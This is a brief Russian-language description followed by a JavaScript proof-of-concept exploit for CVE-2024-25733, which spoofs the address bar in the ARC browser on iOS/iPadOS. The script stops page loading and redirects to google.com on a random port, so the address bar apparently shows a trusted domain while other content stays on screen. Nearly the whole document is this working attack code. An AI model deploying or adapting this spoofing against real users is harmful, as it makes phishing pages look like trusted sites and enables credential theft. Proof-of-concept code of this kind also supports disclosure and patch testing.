
Эксплойт, подтверждающий концепцию, для CVE-2024-25733, демонстрирующий спуфинг адресной строки в браузере ARC на iOS/iPadOS с использованием манипуляции навигацией на основе JavaScript.
PoC подделки адресной строки браузера ARC - iOS/iPadOS
<script>
function spoof() {
setTimeout(() => {
window.stop();
let randomPort;
do {
randomPort = Math.floor(Math.random() * 1000);
} while (randomPort === 0 || randomPort === 443);
document.location = "https://google.com:" + randomPort + "/";
}, 300);
}
spoof();
</script>